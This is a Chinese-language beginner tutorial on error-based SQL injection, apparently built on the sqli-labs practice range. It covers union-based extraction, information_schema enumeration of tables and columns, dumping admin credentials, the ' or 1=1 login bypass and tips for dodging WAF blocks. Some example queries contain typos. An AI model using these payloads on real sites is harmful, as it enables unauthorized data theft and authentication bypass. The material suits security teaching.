什么是SQL?

SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击.

SQL注入的原理

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。总结为一句话就是用户输入的数据被当作代码执行了，与数据库产生了交互。

其实SQL注入分为很多中，比如常规的显错注入，报错注入，盲注，DNS注入，反弹注入，偏移注入等等，在后面的文章中会为大家一一介绍。

显错注入

今天为先为大家介绍一下显错注入，什么是显错注入？看名字可以理解，其实所谓的显错注入就是在我们进行sql注入的时候，当我们输入的语句与系统数据库进行交互的时候，我们可以很直观的观察到系统页面的变化。

比如：原系统网址为

http://xxx.xxx.xxx/1.php?id=1

当我们拼接sql语句如

http://xxx.xxx.xxx/1.php?id=1+and+1=1-- a 页面返回正常

http://xxx.xxx.xxx/1.php?id=1+and+1=2-- a 页面返回异常，我们之前的页面信息都消失不见了

那么这就是最明显的页面交互，页面会有明显的发生变化。

那么我们在做SQL注入的时候流程怎么走呢？

首先我们在对一个站点进行测试的时候，需要先有一个注入点，然后才能进行申请sql注入的测试。

如何判断注入点？

首先判断一个网站是否存在注入点，就要先找到一个传参点，就拿上图来说，?id=1就是网站传参的点，比如，当id=2，id=3...的时候页面会发生变化，说明这个位置与数据库产生交互，我们可以试着用这个位置拼接我们的语句进行注入。

最简单的方式就是拼接 and 1=1 ,因为and 1=1 执行的结果是ture，无论之前的语句是什么都会成立的，假设系统原本的执行语句为：

select * from aa where id = 1

当他拼接了我们的语句

select * from aa where id = 1 and 1=1

这个语句依然成立，从而页面返回正常，但这知识理想的假设，再比如原本的语句为

select * from aa where id=1 and cid=12 and user='sdas'

这时候页面显示给我们的id=1 如果我们拼接了and 1=1 order by 1，原来的语句就会变成

select * from aa where id=1 and 1=1 order by 1 and cid=12 and user='sdas'

就会早成语句order 后面的语句报错 整条语句不会执行，所以我们在这里要用到注释

-- a 、 --+ 、 # 、； 等，针对不同的数据库注释符号不同，一般会使用-- a ，因为这个位置的空格会被浏览器解析掉，所以默认在空格后面加上一些字符让浏览器解析到空格。从而导致后面的语句被注销，前面的语句依然可以正常执行，比如

select * from aa where id=1 and 1=1 order by 1 -- afsa and cid=12 and user='sdas'

既然可以拼接and 1=1 那么我们可以拼接一些其他的，比如

select * from aa where id=1 and 1=1 union select username，password from admin limit 0,1-- asd

直接去查找管理员的账号密码，当然上面这条语句在执行的时候会报错的，因为每个表都有固定的字段，如果想把两个表拼接到一起执行出数据，就需要两个表的字段一样，所以我们要先判断字段

如何判断字段数？

一般我们都会利用order by 来判断字段数，order by 是排序，根据某一列排序，而在数据库中，每一列可以用数字代替，比如aa这个表有5个字段，当我们order by 6的时候系统会应为找不到这个字段而报错，所以就可以判断aa为5个字段。

那么假设我们的admin表有三个字段，如何于五个字段的aa表一起执行的，那么这里我们就用到了占位，语句如

select * from aa where id=1 and 1=1 union select 1,2,3,4,5 from admin

但是，有没有想过，我们怎么知道admin表有多少个字段呢，再或者一步去想，我们怎么知道数据库有没有admin这个表呢，那么这就要关系到下面我要讲的。

mysql数据库，与其他数据库不太一样，mysql在执行SQL语句的时候可以不用去针对某个表，不如

select 1，2，3，4，5

就会在表中显示1，2，3，4，5.那么当上面的语句于我们的语句拼接在一起的时候系统会默认查出来两条或者多条数据，而页面只能显示一条数据，怎么办呢，我们可以想一下，当前面执行的语句没有查到数据，后面的语句查到了，那么不就会显示后面的数据了吗！比如

select * from aa and 1=2 union select 1，2，3，4，5

这里我直接用靶场页面，这里通过order by判断的是两个字段。

有没有发现页面返回了一个2，为什么返回一个2，想过没有。假设前面的aa表有两个字段，原本页面查询到的数据是aa 这个表中id=1这一列第二列的数据 ，但我们通过拼接两个字段进去之后1，2就代替了原本的第二列的数据显示出来，这也就是我们所说的回显点。判断得到回显点了之后我们要值到数据库有没有这个表，知道有没有这个表之前，我们还要先知道当前是处于哪个数据库，因为mysql数据库会存在很多自建库名，我们需要先知道当前的库名。

如何判断当前库？

这里给大家引入一个mysql默认的函数。database(),database中文翻译出来就是数据库，而这个函数的作用就是返回当前系统锁在的库，比如之前的aa处于哪个数据库里面？我们你可以利用database() 进行查询到，我们把上面的回显点换成database(),让他去查询当前所在的库名。

页面返回了maoshe，也就是当前的数据库名称，知道了数据库名称，我们要知道当前的库有哪些表。

如何判断表名以及字段名的？

这里在给大家引入几个函数，information_schema mysql的系统自带库，它提供了访问数据库元数据的方式。什么是元数据呢？元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。在MySQL中，把 information_schema 看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。这里我只给大家介绍几个参数：

TABLES表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

table_name:可以理解为TABLES表中的一个表示表名的函数。

column_name:可以理解为COLUMNS表中的一个表示列名的函数。

查询表的语句可以这么写：

select * from aa id=1 and 1=2 union select 1，table_name from information_schema.tables where  table_schema=database() and database()='maoshe' limit 0,1-- asfa

这里的limit是用来排序的，我么可以利用group_concat()来一次查询出所有表

select * from aa id=1 and 1=2 union select 1，group_concat(table_name） from information_schema.tables where table_schema=database() and database()='maoshe' -- asfa

这时候我们就可以根据表中数据进行查询，但是我们知道表名如何查询字段的名称呢，语句如下

select* from aa where id=1 and 1=2 select 1,column_name from information_schema.columns where table_name='admin' limit 0,1-- a

一次查询出来为

select* from aa where id=1 and 1=2 select 1,group_concat(column_name) from information_schema.columns where table_name='admin' limit 0,1-- a

既然知道了表名和字段名称，那么我们就可以直接通过联合查询去查询帐号和密码.

当然我们在进行黑盒测试的时候是看不到源代码的，所以说执行的sql语句我们是看不到的，这里就需要我们注意了。通常开发人员在编写执行代码的时候会在原执行的SQL语句中添加一些特殊字符来防止sql注入。

比如：正常的sql语句为

Select * from admin where id=1

经过添加特殊字符之后可能会变成这个样子

select *from user where id='1'

select *from user where id=('1')

select *from user where id=("1")

这时候我们在进行注入的时候需要注意闭合，

比如：当我们闭合了之后语局会变成这个样子

select *from user where id='1' and 1=1-- a'

select *from user where id=('1') and 1=1-- a')

select *from user where id=("1") and 1=1-- a")

当然对于这种传参我们一般会在get传参的时候遇到，对于post传参我们通常会遇到这样的语句

比如：登录框的位置

select *from user where username ='' and password=''

需要我们输入用户名密码进行验证登录，当语句没有经过过滤的时候我们可以传入这样的语句

select *from user where username =''or 1=1-- a' and password=''

这也就是我们常说的万能密码，当然一般的开发人员都会对传参位置进行很多限制，

比如

select *from user where username =("") and password=("")

select *from user where username ='' and password=''

这只是简单的需要进行闭合，与上面get传参一样，当然过滤的方式有很多种，这就要涉及到bypass那一块了，当开发人员过滤了某些特殊字符，我们不能使用一些传参的时候，怎么进行绕过。

首先我们看一个网站是否存在注入点，别一来就加单引号，因为某些敏感的网站，你加了单引号，你的ip直接被ban了，

比如：

http://127.0.0.1/sql/Less-1/?id=1-1    

http://127.0.0.1/sql/Less-1/?id=1

看这2个回显的长度，用burpsuit看length，这是基于数字型的

http://127.0.0.1/sql/Less-1/?id=1'-'1   

http://127.0.0.1/sql/Less-1/?id=1'-'0     

这是基于字符串型的

如果是空数据类型的，这样判断

http://127.0.0.1/sql/Less-1/?id=1-exp(11111)    

如若用and 1=1,我建议不要这样，因为现在大部分网站都会拦截，我们可以

1%2b1=2  

1%2b1>1   这样判断

本篇文章至此结束，希望对刚入门的朋友有所帮助。